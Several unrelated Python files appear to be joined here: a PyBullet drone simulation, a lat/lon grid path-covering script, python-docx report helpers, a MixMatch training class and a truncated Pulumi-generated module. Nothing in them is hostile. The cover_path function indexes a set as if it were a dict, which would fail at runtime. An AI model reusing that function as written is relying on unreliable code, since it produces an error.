target_position=STATE[0:3],
target_velocity=np.zeros(3),
target_acceleration=np.zeros(3)
)
#### Initialize the target trajectory ######################
TARGET_POSITION = np.array([[0, 4.0*np.cos(0.006*i), 1.0] for i in range(DURATION*ENV.SIM_FREQ)])
TARGET_VELOCITY = np.zeros([DURATION * ENV.SIM_FREQ, 3])
TARGET_ACCELERATION = np.zeros([DURATION * ENV.SIM_FREQ, 3])
#### Derive the target trajectory to obtain target velocities and accelerations
TARGET_VELOCITY[1:, :] = (TARGET_POSITION[1:, :] - TARGET_POSITION[0:-1, :])/ENV.SIM_FREQ
TARGET_ACCELERATION[1:, :] = (TARGET_VELOCITY[1:, :] - TARGET_VELOCITY[0:-1, :]) / ENV.SIM_FREQ
#### Run the simulation ####################################
START = time.time()
for i in range(0, DURATION*ENV.SIM_FREQ):
### Secret control performance booster #####################
# if i/ENV.SIM_FREQ>3 and i%30==0 and i/ENV.SIM_FREQ<10: p.loadURDF("duck_vhacd.urdf", [random.gauss(0, 0.3), random.gauss(0, 0.3), 3], p.getQuaternionFromEuler([random.randint(0, 360),random.randint(0, 360),random.randint(0, 360)]), physicsClientId=PYB_CLIENT)
#### Step the simulation ###################################
OBS, _, _, _ = ENV.step(ACTION)
#### Compute control for drone 0 ###########################
STATE = OBS["0"]["state"]
ACTION["0"] = CTRL_0.compute_control(current_position=STATE[0:3],
current_velocity=STATE[10:13],
current_rpy=STATE[7:10],
target_position=TARGET_POSITION[i, :],
target_velocity=TARGET_VELOCITY[i, :],
target_acceleration=TARGET_ACCELERATION[i, :]
)
#### Log drone 0 ###########################################
LOGGER.log(drone=0, timestamp=i/ENV.SIM_FREQ, state=STATE)
#### Compute control for drone 1 ###########################
STATE = OBS["1"]["state"]
ACTION["1"] = CTRL_1.compute_control(current_position=STATE[0:3],
current_velocity=STATE[10:13],
current_rpy=STATE[7:10],
target_position=TARGET_POSITION[i, :] + np.array([-.3, .0, .0]),
target_velocity=TARGET_VELOCITY[i, :],
target_acceleration=TARGET_ACCELERATION[i, :]
)
#### Log drone 1 ###########################################
LOGGER.log(drone=1, timestamp=i/ENV.SIM_FREQ, state=STATE)
#### Compute control for drone 2 ###########################
STATE = OBS["2"]["state"]
ACTION["2"] = CTRL_2.compute_control(current_position=STATE[0:3],
current_velocity=STATE[10:13],
current_rpy=STATE[7:10],
target_position=TARGET_POSITION[i, :] + np.array([.3, .0, .0]),
target_velocity=TARGET_VELOCITY[i, :],
target_acceleration=TARGET_ACCELERATION[i, :]
)
#### Log drone 2 ###########################################
LOGGER.log(drone=2, timestamp=i/ENV.SIM_FREQ, state=STATE)
#### Printout ##############################################
if i%ENV.SIM_FREQ == 0:
ENV.render()
#### Sync the simulation ###################################
if GUI:
sync(i, START, ENV.TIMESTEP)
#### Close the ENVironment #################################
ENV.close()
#### Save the simulation results ###########################
LOGGER.save()
#### Plot the simulation results ###########################
LOGGER.plot()
|
from pprint import pprint
from math import floor
from math import sqrt
from uuid import uuid4
### CHANGE THESE VARIABLES TO CHANGE GRID GENERATION
# digits = each point is placed in a box generated from the lat/lon coordinates,
# by rounding down to the nearest digit specified by digits.
# If digits is increased, the box size will decrease.
digits = 3
# buff = if a point is close to the edge of its bounding box within some buff percent,
# another box will gen generated next to the point to account for the fact that
# the line is on the edge. Increase the buffer to be more liberal about what counts
# as the edge. As buff goes up, more boxes will be generated
buff = 0.05
# step = points between the start and end of each section of the path are generated by
# stepping through the paramterized line. Decrease the step to intersperse
# more points, which will allow the program to catch more points where the
# line is very close to the edge of the bounding box. Do not increase more than 1.
# Increasing this value will make this program run faster, decreasing it will make
# it run slower.
step = 0.5
ratio = 10 ** digits
my_floor = lambda x: floor(x*ratio)/ratio
def increment(square):
x_0 = square[0]
y_0 = square[1]
x_1 = (square[0]*ratio+1)/ratio
y_1 = (square[1]*ratio+1)/ratio
return ((x_0,x_1),(y_0,y_1))
def get_adj(square):
squares = set()
x_new = round((square[0]*ratio-1)/ratio, digits)
y_new = square[1]
squares.add((x_new,y_new))
x_new = round((square[0]*ratio+1)/ratio, digits)
y_new = square[1]
squares.add((x_new,y_new))
x_new = square[0]
y_new = round((square[1]*ratio-1)/ratio,digits)
squares.add((x_new,y_new))
x_new = square[0]
y_new = round((square[1]*ratio+1)/ratio,digits)
squares.add((x_new,y_new))
# diagonal
x_new = round((square[0]*ratio-1)/ratio, digits)
y_new = round((square[1]*ratio-1)/ratio,digits)
squares.add((x_new,y_new))
x_new = round((square[0]*ratio+1)/ratio, digits)
y_new = round((square[1]*ratio+1)/ratio,digits)
squares.add((x_new,y_new))
x_new = round((square[0]*ratio-1)/ratio, digits)
y_new = round((square[1]*ratio+1)/ratio,digits)
squares.add((x_new,y_new))
x_new = round((square[0]*ratio+1)/ratio, digits)
y_new = round((square[1]*ratio-1)/ratio,digits)
squares.add((x_new,y_new))
return squares
def check_border(point, square):
total_square = increment(square)
x = total_square[0]
y = total_square[1]
x_buff = ((x[1]*ratio-x[0]*ratio)/ratio)*buff
y_buff = ((y[1]*ratio-y[0]*ratio)/ratio)*buff
squares = set()
squares.add(square)
# adjacent
if point[0] < x[0] + x_buff:
x_new = round((square[0]*ratio-1)/ratio, digits)
y_new = square[1]
squares.add((x_new,y_new))
if point[0] > x[1] - x_buff:
x_new = round((square[0]*ratio+1)/ratio, digits)
y_new = square[1]
squares.add((x_new,y_new))
if point[1] < y[0] + y_buff:
x_new = square[0]
y_new = round((square[1]*ratio-1)/ratio,digits)
squares.add((x_new,y_new))
if point[1] > y[1] - y_buff:
x_new = square[0]
y_new = round((square[1]*ratio+1)/ratio,digits)
squares.add((x_new,y_new))
# diagonal
if point[0] < x[0] + x_buff and point[1] < y[0] + y_buff:
x_new = round((square[0]*ratio-1)/ratio, digits)
y_new = round((square[1]*ratio-1)/ratio,digits)
squares.add((x_new,y_new))
if point[0] > x[1] - x_buff and point[1] > y[1] - y_buff:
x_new = round((square[0]*ratio+1)/ratio, digits)
y_new = round((square[1]*ratio+1)/ratio,digits)
squares.add((x_new,y_new))
if point[0] < x[0] + x_buff and point[1] > y[1] - y_buff:
x_new = round((square[0]*ratio-1)/ratio, digits)
y_new = round((square[1]*ratio+1)/ratio,digits)
squares.add((x_new,y_new))
if point[0] > x[1] - x_buff and point[1] < y[0] + y_buff:
x_new = round((square[0]*ratio+1)/ratio, digits)
y_new = round((square[1]*ratio-1)/ratio,digits)
squares.add((x_new,y_new))
return squares
def cover_path(path):
squares = set()
for i in range(0,len(path)-1):
start = (path[i]['x'],path[i]['y'])
end = (path[i+1]['x'],path[i+1]['y'])
# round down to get start and end points
# remember we can uniquely identify these by coordinates of upper left corner
start_square = tuple(map(my_floor, start))
end_square = tuple(map(my_floor, end))
if start_square != end_square:
start_squares = check_border(start,start_square)
end_squares = check_border(end,end_square)
for start_square in start_squares:
squares.add(start_square)
for end_square in end_squares:
squares.add(end_square)
total_start = increment(start_square)
total_start_x = total_start[0]
total_start_y = total_start[1]
total_end = increment(end_square)
total_end_x = total_end[0]
total_end_y = total_end[1]
"""
diff = 1/ratio
slope = (start[1] - end[1])/(start[0] - end[0])
f = lambda x: x*slope + (start[1] - start[0]*slope)
"""
# parameterize line from start to end as f(t)
# let f(0) = start
delta_x = end[0] - start[0]
delta_y = end[1] - start[1]
dist = sqrt(delta_x*delta_x + delta_y*delta_y)
f = lambda t: ((delta_x/dist)*t + start[0],
(delta_y/dist)*t + start[1])
square = start_square
t = 0
while t <= dist:
if square not in squares:
squares[square] = []
t += step/ratio
point = f(t)
square = tuple(map(my_floor,point))
more_squares = check_border(point,square)
for ms in more_squares:
squares.add(ms)
return squares
|
import os
import re
from datetime import datetime, timedelta
import docx
import csv
from docx import Document
from docx.enum.dml import *
from docx.enum.table import *
from docx.enum.text import *
from docx.oxml.ns import qn
from docx.oxml import OxmlElement
from docx.enum.section import WD_ORIENT
from docx.enum.section import WD_SECTION
from docx.shared import Cm, RGBColor
import pandas as pd
import numpy as np
import main as m
import matplotlib.pyplot as plt
import win32com.client as client
from docx.enum.table import *
#Edited from https://stackoverflow.com/questions/32992457/update-the-toc-table-of-content-of-ms-word-docx-documents-with-python
def update_toc(docx_file):
word = client.DispatchEx("Word.Application")
try:
doc = word.Documents.Open(docx_file)
doc.TablesOfContents(1).Update()
doc.Close(SaveChanges=True)
finally:
word.Quit()
del word
#Edited from https://stackoverflow.com/questions/47666642/adding-an-hyperlink-in-msword-by-using-python-docx
def add_hyperlink(paragraph, text, url):
# This gets access to the document.xml.rels file and gets a new relation id value
part = paragraph.part
r_id = part.relate_to(url, docx.opc.constants.RELATIONSHIP_TYPE.HYPERLINK, is_external=True)
# Create the w:hyperlink tag and add needed values
hyperlink = docx.oxml.shared.OxmlElement('w:hyperlink')
hyperlink.set(docx.oxml.shared.qn('r:id'), r_id, )
# Create a w:r element and a new w:rPr element
new_run = docx.oxml.shared.OxmlElement('w:r')
rPr = docx.oxml.shared.OxmlElement('w:rPr')
# Join all the xml elements together add add the required text to the w:r element
new_run.append(rPr)
new_run.text = text
hyperlink.append(new_run)
# Create a new Run object and add the hyperlink into it
r = paragraph.add_run()
r._r.append(hyperlink)
# A workaround for the lack of a hyperlink style (doesn't go purple after using the link)
# Delete this if using a template that has the hyperlink style in it
r.font.color.theme_color = MSO_THEME_COLOR_INDEX.HYPERLINK
r.font.underline = True
return hyperlink
#Edited from https://stackoverflow.com/questions/55572685/how-set-direction-of-table-of-content-in-docx-files-uisng-python-docx
def create_Toc(cr_document):
cont = cr_document.add_heading('Table of Contents', 8)
cont.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER
paragraph = cr_document.add_paragraph()
run = paragraph.add_run()
fldChar = OxmlElement('w:fldChar') # creates a new element
fldChar.set(qn('w:fldCharType'), 'begin') # sets attribute on element
instrText = OxmlElement('w:instrText')
instrText.set(qn('xml:space'), 'preserve') # sets attribute on element
instrText.text = 'TOC \\o "1-4" \\h \\z \\u' # change 1-4 depending on heading levels you need
fldChar2 = OxmlElement('w:fldChar')
fldChar2.set(qn('w:fldCharType'), 'separate')
fldChar3 = OxmlElement('w:t')
fldChar3.text = "Right-click to update field."
fldChar2.append(fldChar3)
fldChar4 = OxmlElement('w:fldChar')
fldChar4.set(qn('w:fldCharType'), 'end')
r_element = run._r
r_element.append(fldChar)
r_element.append(instrText)
r_element.append(fldChar2)
r_element.append(fldChar4)
cr_document.add_page_break()
def line_brake(doc, n):
for i in range(0, n):
doc.add_paragraph()
def change_orientation(document):
current_section = document.sections[-1]
new_width, new_height = current_section.page_height, current_section.page_width
new_section = document.add_section(WD_SECTION.NEW_PAGE)
new_section.orientation = WD_ORIENT.LANDSCAPE
new_section.page_width = new_width
new_section.page_height = new_height
def csv2chart(file,doc):
with open(file, newline='') as csv_file:
csv_reader = csv.reader(csv_file)
csv_headers = next(csv_reader)
csv_cols = len(csv_headers)
table = doc.add_table(rows=1, cols=csv_cols)
table.style = 'LightGrid-Accent1'
table.autofit = False
col = table.columns[0]
col.width = Cm(1)
hdr_cells = table.rows[0].cells
for i in range(csv_cols):
hdr_cells[i].text = csv_headers[i]
for row in csv_reader:
row_cells = table.add_row().cells
for i in range(csv_cols):
row_cells[i].text = row[i]
#https://github.com/python-openxml/python-docx/issues/113
def convert_to_pdf(filepath:str):
"""Save a pdf of a docx file."""
try:
word = client.DispatchEx("Word.Application")
target_path = filepath.replace(".docx", r".pdf")
word_doc = word.Documents.Open(filepath)
word_doc.SaveAs(target_path, FileFormat=17)
word_doc.Close()
except Exception as e:
raise e
finally:
word.Quit() |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MixMatch implementation."""
from util.semisup import SemiSup
import tensorflow as tf
class MixMatch(SemiSup):
"""MixMatch."""
def __init__(self, hparams):
super().__init__(hparams)
assert (self.num_augment == 1) and (
len(self.augment)
== 1), 'number of labeled data augmentation for {} should be 1'.format(
self.__class__.__name__)
assert (self.num_strongaug == 0) and (
len(self.strongaug)
== 1), 'number of strong augmentation for {} should be 0'.format(
self.__class__.__name__)
self.list_of_metrics += ['per_class_acc.train', 'per_class_monitor.model']
def set_ssl_hparams(self, hparams):
self.mixup_beta = hparams.mixup_beta
self.mixup_prob = hparams.mixup_prob
self.file_suffix += '_beta{:g}'.format(self.mixup_beta)
def get_train_step_fn(self, current_dalign_t=None):
"""Train step."""
@tf.function
def step_fn(data):
"""Train step for MixMatch model.
Args:
data: Tuple of labeled and unlabeled data. Labeled data (data[0]) is an
(images, label, index) tuple. Unlabeled data (data[1]) is an (images,
label, index) tuple. Multiple augmented images of the same instance
are available.
"""
xl, yl = data[0][0], data[0][-2]
xu, yu, _ = data[1][:self.num_weakaug], data[1][-2], data[1][-1]
num_aug = len(xu)
xu = tf.concat(xu, axis=0)
replica_context = tf.distribute.get_replica_context()
if self.reweight_labeled:
reweight_labeled_weights = 1 / (1e-6 + self.p_data())
reweight_labeled_weights /= tf.reduce_sum(reweight_labeled_weights)
reweight_labeled_weights *= self.num_class
with tf.GradientTape() as tape:
# MixUp
logits_u = self.model(xu, training=True)['logits']
pseudo_target, pseudo_mask = self.get_pseudo_target(
tf.split(logits_u, num_aug), current_dalign_t=current_dalign_t)
xmix, ymix = self.get_mixed_data(
x1=tf.concat([xl, xu], axis=0),
l1=tf.concat([
tf.one_hot(tf.cast(yl[:, 0], dtype=tf.int32), self.num_class),
pseudo_target
],
axis=0),
x2=tf.concat([xl, xu], axis=0),
l2=tf.concat([
tf.one_hot(tf.cast(yl[:, 0], dtype=tf.int32), self.num_class),
pseudo_target
],
axis=0),
beta=self.mixup_beta,
replica_context=replica_context)
logits = self.model(xmix, training=True)['logits']
logits_l, logits_m = logits[:xl.shape[0]], logits[xl.shape[0]:]
labels_l, labels_m = ymix[:xl.shape[0]], ymix[xl.shape[0]:]
# Compute supervised loss.
loss_xe = tf.keras.losses.categorical_crossentropy(
labels_l, logits_l, from_logits=True)
if self.reweight_labeled:
loss_xe *= tf.gather(reweight_labeled_weights,
tf.cast(yl[:, 0], tf.int32))
loss_xe = tf.divide(
tf.reduce_sum(loss_xe),
self.cross_replica_concat(loss_xe,
replica_context=replica_context).shape[0])
# Compute unsupervised loss.
loss_xeu = self.get_unsup_loss(
labels_m, logits_m, mode=self.unsup_loss_type)
loss_xeu = tf.reduce_sum(loss_xeu * pseudo_mask)
loss_xeu = tf.divide(
loss_xeu,
self.get_unsup_loss_divisor(
pseudo_mask,
mode=self.unsup_loss_divisor,
replica_context=replica_context))
# Compute l2 weight decay loss.
loss_wd = self.loss_wd(self.model.trainable_weights)
# Compute total loss.
loss = loss_xe + self.weight_decay * loss_wd
loss = loss + self.weight_unsup * loss_xeu
grad = tape.gradient(loss, self.model.trainable_weights)
self.optimizer.apply_gradients(zip(grad, self.model.trainable_weights))
# EMA update.
self.ema_update(ema_decay=self.ema_decay)
# Metric monitor update.
self.metric_update({
'loss.train': loss * self.strategy.num_replicas_in_sync,
'loss.xe': loss_xe * self.strategy.num_replicas_in_sync,
'loss.xeu': loss_xeu * self.strategy.num_replicas_in_sync,
'loss.wd': loss_wd * self.strategy.num_replicas_in_sync,
'acc.train': (yl, tf.argmax(logits_l, axis=1)),
'acc.unlab': (yu, tf.argmax(tf.split(logits_u, num_aug)[0], axis=1)),
'per_class_acc.train': (yl, tf.argmax(logits_l, axis=1)),
'per_class_monitor.model': self.p_model(),
'monitor.mask': tf.reduce_mean(pseudo_mask),
'monitor.kl_data':
self.kl_divergence(
prob_a=tf.ones([self.num_class]) / self.num_class,
prob_b=self.p_data()),
'monitor.kl_model':
self.kl_divergence(
prob_a=tf.ones([self.num_class]) / self.num_class,
prob_b=self.p_model())
})
# Update model and data distributions.
self.p_model.update(tf.stop_gradient(tf.nn.softmax(logits_u)))
self.p_data.update(
tf.one_hot(tf.cast(tf.squeeze(yl), dtype=tf.int32), self.num_class))
return step_fn
|
<filename>sdk/python/pulumi_kubernetes_ingress_nginx/_inputs.py<gh_stars>1-10
# coding=utf-8
# *** WARNING: this file was generated by Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
import pulumi_kubernetes
__all__ = [
'AutoscalingBehaviorScalingPolicyArgs',
'AutoscalingBehaviorScalingArgs',
'AutoscalingBehaviorArgs',
'AutoscalingTemplatePodsMetricArgs',
'AutoscalingTemplatePodsTargetArgs',
'AutoscalingTemplatePodsArgs',
'AutoscalingTemplateArgs',
'AutoscalingArgs',
'ContollerAdmissionWebhooksArgs',
'ControllerAdmissionWebhooksCreateSecretJobArgs',
'ControllerAdmissionWebhooksPatchWebhbookJobArgs',
'ControllerAdmissionWebhooksPatchArgs',
'ControllerAdmissionWebhooksServiceArgs',
'ControllerCustomTemplateArgs',
'ControllerDefaultBackendServiceArgs',
'ControllerDefaultBackendArgs',
'ControllerHostPortPortsArgs',
'ControllerHostPortArgs',
'ControllerImageArgs',
'ControllerIngressClassResourceArgs',
'ControllerMetricsPrometheusRulesArgs',
'ControllerMetricsServiceMonitorArgs',
'ControllerMetricsServiceArgs',
'ControllerMetricsArgs',
'ControllerPodSecurityPolicyArgs',
'ControllerPortArgs',
'ControllerPublishServiceArgs',
'ControllerRBACArgs',
'ControllerRollingUpdateArgs',
'ControllerScopeArgs',
'ControllerServiceAccountArgs',
'ControllerServiceInternalArgs',
'ControllerServiceNodePortsArgs',
'ControllerServiceArgs',
'ControllerTcpArgs',
'ControllerUdpArgs',
'ControllerUpdateStrategyArgs',
'ControllerArgs',
'KedaScaledObjectArgs',
'KedaTriggerArgs',
'KedaArgs',
'ReleaseArgs',
'RepositoryOptsArgs',
]
@pulumi.input_type
class AutoscalingBehaviorScalingPolicyArgs:
def __init__(__self__, *,
period_seconds: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[int]] = None):
if period_seconds is not None:
pulumi.set(__self__, "period_seconds", period_seconds)
if type is not None:
pulumi.set(__self__, "type", type)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="periodSeconds")
def period_seconds(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "period_seconds")
@period_seconds.setter
def period_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period_seconds", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class AutoscalingBehaviorScalingArgs:
def __init__(__self__, *,
policies: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingBehaviorScalingPolicyArgs']]]] = None,
stabilization_window_seconds: Optional[pulumi.Input[int]] = None):
if policies is not None:
pulumi.set(__self__, "policies", policies)
if stabilization_window_seconds is not None:
pulumi.set(__self__, "stabilization_window_seconds", stabilization_window_seconds)
@property
@pulumi.getter
def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingBehaviorScalingPolicyArgs']]]]:
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingBehaviorScalingPolicyArgs']]]]):
pulumi.set(self, "policies", value)
@property
@pulumi.getter(name="stabilizationWindowSeconds")
def stabilization_window_seconds(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "stabilization_window_seconds")
@stabilization_window_seconds.setter
def stabilization_window_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "stabilization_window_seconds", value)
@pulumi.input_type
class AutoscalingBehaviorArgs:
def __init__(__self__, *,
scale_down: Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']] = None,
scale_up: Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']] = None):
if scale_down is not None:
pulumi.set(__self__, "scale_down", scale_down)
if scale_up is not None:
pulumi.set(__self__, "scale_up", scale_up)
@property
@pulumi.getter(name="scaleDown")
def scale_down(self) -> Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']]:
return pulumi.get(self, "scale_down")
@scale_down.setter
def scale_down(self, value: Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']]):
pulumi.set(self, "scale_down", value)
@property
@pulumi.getter(name="scaleUp")
def scale_up(self) -> Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']]:
return pulumi.get(self, "scale_up")
@scale_up.setter
def scale_up(self, value: Optional[pulumi.Input['AutoscalingBehaviorScalingArgs']]):
pulumi.set(self, "scale_up", value)
@pulumi.input_type
class AutoscalingTemplatePodsMetricArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None):
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class AutoscalingTemplatePodsTargetArgs:
def __init__(__self__, *,
average_value: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
if average_value is not None:
pulumi.set(__self__, "average_value", average_value)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="averageValue")
def average_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "average_value")
@average_value.setter
def average_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "average_value", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class AutoscalingTemplatePodsArgs:
def __init__(__self__, *,
metric: Optional[pulumi.Input['AutoscalingTemplatePodsMetricArgs']] = None,
target: Optional[pulumi.Input['AutoscalingTemplatePodsTargetArgs']] = None):
if metric is not None:
pulumi.set(__self__, "metric", metric)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter
def metric(self) -> Optional[pulumi.Input['AutoscalingTemplatePodsMetricArgs']]:
return pulumi.get(self, "metric")
@metric.setter
def metric(self, value: Optional[pulumi.Input['AutoscalingTemplatePodsMetricArgs']]):
pulumi.set(self, "metric", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input['AutoscalingTemplatePodsTargetArgs']]:
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input['AutoscalingTemplatePodsTargetArgs']]):
pulumi.set(self, "target", value)
@pulumi.input_type
class AutoscalingTemplateArgs:
def __init__(__self__, *,
pods: Optional[pulumi.Input['AutoscalingTemplatePodsArgs']] = None,
type: Optional[pulumi.Input[str]] = None):
if pods is not None:
pulumi.set(__self__, "pods", pods)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def pods(self) -> Optional[pulumi.Input['AutoscalingTemplatePodsArgs']]:
return pulumi.get(self, "pods")
@pods.setter
def pods(self, value: Optional[pulumi.Input['AutoscalingTemplatePodsArgs']]):
pulumi.set(self, "pods", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class AutoscalingArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
controller_autoscaling_behavior: Optional[pulumi.Input['AutoscalingBehaviorArgs']] = None,
enabled: Optional[pulumi.Input[bool]] = None,
max_replicas: Optional[pulumi.Input[int]] = None,
min_replicas: Optional[pulumi.Input[int]] = None,
target_cpu_utilization_percentage: Optional[pulumi.Input[int]] = None,
target_memory_utilization_percentage: Optional[pulumi.Input[int]] = None):
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if controller_autoscaling_behavior is not None:
pulumi.set(__self__, "controller_autoscaling_behavior", controller_autoscaling_behavior)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if max_replicas is not None:
pulumi.set(__self__, "max_replicas", max_replicas)
if min_replicas is not None:
pulumi.set(__self__, "min_replicas", min_replicas)
if target_cpu_utilization_percentage is not None:
pulumi.set(__self__, "target_cpu_utilization_percentage", target_cpu_utilization_percentage)
if target_memory_utilization_percentage is not None:
pulumi.set(__self__, "target_memory_utilization_percentage", target_memory_utilization_percentage)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="controllerAutoscalingBehavior")
def controller_autoscaling_behavior(self) -> Optional[pulumi.Input['AutoscalingBehaviorArgs']]:
return pulumi.get(self, "controller_autoscaling_behavior")
@controller_autoscaling_behavior.setter
def controller_autoscaling_behavior(self, value: Optional[pulumi.Input['AutoscalingBehaviorArgs']]):
pulumi.set(self, "controller_autoscaling_behavior", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="maxReplicas")
def max_replicas(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_replicas")
@max_replicas.setter
def max_replicas(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_replicas", value)
@property
@pulumi.getter(name="minReplicas")
def min_replicas(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_replicas")
@min_replicas.setter
def min_replicas(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_replicas", value)
@property
@pulumi.getter(name="targetCPUUtilizationPercentage")
def target_cpu_utilization_percentage(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "target_cpu_utilization_percentage")
@target_cpu_utilization_percentage.setter
def target_cpu_utilization_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "target_cpu_utilization_percentage", value)
@property
@pulumi.getter(name="targetMemoryUtilizationPercentage")
def target_memory_utilization_percentage(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "target_memory_utilization_percentage")
@target_memory_utilization_percentage.setter
def target_memory_utilization_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "target_memory_utilization_percentage", value)
@pulumi.input_type
class ContollerAdmissionWebhooksArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
certificate: Optional[pulumi.Input[str]] = None,
create_secret_job: Optional[pulumi.Input['ControllerAdmissionWebhooksCreateSecretJobArgs']] = None,
enabled: Optional[pulumi.Input[bool]] = None,
existing_psp: Optional[pulumi.Input[str]] = None,
failure_policy: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
namespace_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
object_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
patch: Optional[pulumi.Input['ControllerAdmissionWebhooksPatchArgs']] = None,
patch_webhook_job: Optional[pulumi.Input['ControllerAdmissionWebhooksPatchWebhbookJobArgs']] = None,
port: Optional[pulumi.Input[int]] = None,
service: Optional[pulumi.Input['ControllerAdmissionWebhooksServiceArgs']] = None,
timeout_seconds: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] existing_psp: Use an existing PSP instead of creating one.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if certificate is not None:
pulumi.set(__self__, "certificate", certificate)
if create_secret_job is not None:
pulumi.set(__self__, "create_secret_job", create_secret_job)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if existing_psp is not None:
pulumi.set(__self__, "existing_psp", existing_psp)
if failure_policy is not None:
pulumi.set(__self__, "failure_policy", failure_policy)
if key is not None:
pulumi.set(__self__, "key", key)
if namespace_selector is not None:
pulumi.set(__self__, "namespace_selector", namespace_selector)
if object_selector is not None:
pulumi.set(__self__, "object_selector", object_selector)
if patch is not None:
pulumi.set(__self__, "patch", patch)
if patch_webhook_job is not None:
pulumi.set(__self__, "patch_webhook_job", patch_webhook_job)
if port is not None:
pulumi.set(__self__, "port", port)
if service is not None:
pulumi.set(__self__, "service", service)
if timeout_seconds is not None:
pulumi.set(__self__, "timeout_seconds", timeout_seconds)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def certificate(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "certificate")
@certificate.setter
def certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate", value)
@property
@pulumi.getter(name="createSecretJob")
def create_secret_job(self) -> Optional[pulumi.Input['ControllerAdmissionWebhooksCreateSecretJobArgs']]:
return pulumi.get(self, "create_secret_job")
